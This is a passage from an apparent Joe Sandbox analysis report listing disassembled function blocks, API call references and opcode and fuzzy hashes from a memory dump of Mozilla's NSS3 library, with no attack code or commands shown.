                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,?,?,6CEC08AA,?), ref: 6CEB88F6
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CEC08AA,?), ref: 6CEB890B
                                                                                                                                                                                                                                                                                                                      • PR_NotifyCondVar.NSS3(?,?,?,?,?,6CEC08AA,?), ref: 6CEB8936
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CEC08AA,?), ref: 6CEB8940
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 959714679-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d97e4571217ea6b275529fdb3604c6eb3512cfcc9524ecb46d3edd993742fbf
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 760d900c4cfba03ae21565eddede99f4c2087de48b741bf6ea0275de328b197c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d97e4571217ea6b275529fdb3604c6eb3512cfcc9524ecb46d3edd993742fbf
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6018474A04646DFDB10AF39C184669B7F4FF0535CF15562AD88897B00E730E4A4CBD2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CE69003,?), ref: 6CEBFD91
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(A4686CEC,?), ref: 6CEBFDA2
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CEC,?,?), ref: 6CEBFDC4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?), ref: 6CEBFDD1
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2335489644-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d2e1c3932543f9953608b209682bdc70688fb092fa604c20171580d06abf24a8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: df3722e868567005003d25e4264277a2b8d9e87525dc52f1d257a9a30281a745
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2e1c3932543f9953608b209682bdc70688fb092fa604c20171580d06abf24a8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F0FCFD6012025BEB004F55DD90A37B778EF5529DB248135ED19ABB01E731D815C7E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f29458151c43462532e4c011c8b7416df536ff0379855485208e1630ebd8c75
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 79fbd2cfdd14b02af9782ae23c6e2951a41d82fbd4ecabeadb42212140780a67
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f29458151c43462532e4c011c8b7416df536ff0379855485208e1630ebd8c75
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46E065767106089FCA10EFA8DC84C8B77BCEE492703154525E691D3700D331F905CBE5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3 ref: 6CE59E1F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE113C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CDE2352,?,00000000,?,?), ref: 6CE11413
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE113C0: memcpy.VCRUNTIME140(00000000,6CDE2352,00000002,?,?,?,?,6CDE2352,?,00000000,?,?), ref: 6CE114C0
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • ESCAPE expression must be a single character, xrefs: 6CE59F78
                                                                                                                                                                                                                                                                                                                      • LIKE or GLOB pattern too complex, xrefs: 6CE5A006
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                                                                                      • API String ID: 2453365862-264706735
                                                                                                                                                                                                                                                                                                                      • Opcode ID: bb12488a6a95098d299eb93c7216d39a7050df4f13c6ba8a1991e1cba777758d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6426b9334ea6e0709d84c6a1684ef47b1c5ff696b4557136edd54c641ea1e7e5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb12488a6a95098d299eb93c7216d39a7050df4f13c6ba8a1991e1cba777758d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B581B3B0A042554BD700CE29C0813FAB7F2AF4631CFB88659D8A98BB95D737D857C7A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEB4D57
                                                                                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CEB4DE6
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                                                                                      • String ID: %d.%d
                                                                                                                                                                                                                                                                                                                      • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                                                                                      • Opcode ID: c6a38c1414680cfd0e3ded937ea7d296a48609806c071811569eac277257648e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: fd90da0d9c268b123805c74f4af817725a9857e8dcc7933d39abb12cc6c98ae4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a38c1414680cfd0e3ded937ea7d296a48609806c071811569eac277257648e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831E8B2D002186BFB509BA49C01BFF7778EF41308F150469ED15AB781EB349A05CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3('8l,00000000,00000000,?,?,6CED3827,?,00000000), ref: 6CED4D0A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC08B4
                                                                                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6CED4D22
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CE61A3E,00000048,00000054), ref: 6CEBFD56
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                                                                                      • String ID: '8l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1521942269-1867215535
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f2c2ff6e240825e542dabd6f85d175e8d33d07fcbfe07c086ada1073fa6b45b7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F068726011285BDB104E6A9D8074336FC9B5167DF360272DD2CCB781E631EC028692
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetUniqueIdentity.NSS3(SSL), ref: 6CEFAF78
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE5ACE2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: malloc.MOZGLUE(00000001), ref: 6CE5ACEC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE5AD02
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: TlsGetValue.KERNEL32 ref: 6CE5AD3C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: calloc.MOZGLUE(00000001,?), ref: 6CE5AD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: PR_Unlock.NSS3 ref: 6CE5ADC0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: PR_Unlock.NSS3 ref: 6CE5AE8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ACC0: free.MOZGLUE(?), ref: 6CE5AEAB
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(6CFC3084,6CFC02AC,00000090), ref: 6CEFAF94
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID: SSL
                                                                                                                                                                                                                                                                                                                      • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8c2ea54bd246189c032d471d8f81356a03da80661973bfd927cd042205269b48
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0702cbf4f5e74cfedd58c304a706997da63e611a7084fc0f4dba04885afde329
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c2ea54bd246189c032d471d8f81356a03da80661973bfd927cd042205269b48
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE215FB3FA5A889EDB90EF51A5033D77AB0B70278C7305019C1694BB28E371464E9FD6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_GetPageSize.NSS3(6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51370: GetSystemInfo.KERNEL32(?,?,?,?,6CE50936,?,6CE50F20,6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000), ref: 6CE5138F
                                                                                                                                                                                                                                                                                                                      • PR_NewLogModule.NSS3(clock,6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F25
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CE50936,00000001,00000040), ref: 6CE51130
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE50936,00000001,00000040), ref: 6CE51142
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CE50936,00000001), ref: 6CE51167
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                                                                                                                      • String ID: clock
                                                                                                                                                                                                                                                                                                                      • API String ID: 536403800-3195780754
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4870289cb4150e48e9e832d9eac3775a78f538b62dd7a4c273fdbe8bc72e644f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d07dc9f55e6b37b978a65c10f6a207759678f9f82c033e8a0d89df7b0abef173
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4870289cb4150e48e9e832d9eac3775a78f538b62dd7a4c273fdbe8bc72e644f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54D02232B4020411C7402AE79C44B9BB6BCD7C3279F60186BE00803E00CA2744FAC265
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$calloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0c06f759d6e4cc3a073268769d74d7cfc02d7bd4e5cb4e3917890f8a14d556aa
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c7a56ee2bda05d1280e9feb3649809c7e4a3581f5ac7505663cd176d69d65a47
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c06f759d6e4cc3a073268769d74d7cfc02d7bd4e5cb4e3917890f8a14d556aa
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 503193F0B943958FDF406F78868436A7BB4BF0630CF21466DE8A887B11DB359095CB82
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE62AF5,?,?,?,?,?,6CE60A1B,00000000), ref: 6CEC0F1A
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6CEC0F30
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CEC0F42
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEC0F5B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2332725481-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f4ba46ee9f3b80a2667fe9f22253ae36143c4b58c471b54b9bb0a0be2f758b89
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8c6f27df64cfbc23ce4cea88dc17995e3c49d31c948ce484c254ab54e454b0a5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4ba46ee9f3b80a2667fe9f22253ae36143c4b58c471b54b9bb0a0be2f758b89
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01F9F1F102C05BE751273D9E456577A7CEF4225CF210126EC28C2A11D721C49585E3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: dc2720be4499bdd6234669ff31dbe9ac6388c8e4664403d6338a6936d091c534
